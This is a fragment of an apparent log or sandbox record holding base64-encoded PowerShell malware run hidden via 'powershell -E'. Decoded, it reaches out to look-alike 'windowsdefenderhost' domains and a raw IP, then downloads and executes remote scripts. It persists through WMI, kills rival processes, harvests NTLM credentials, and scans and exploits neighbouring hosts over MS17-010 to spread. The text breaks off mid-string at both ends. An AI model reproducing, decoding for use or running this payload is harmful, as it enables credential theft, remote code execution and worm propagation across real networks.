IAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoA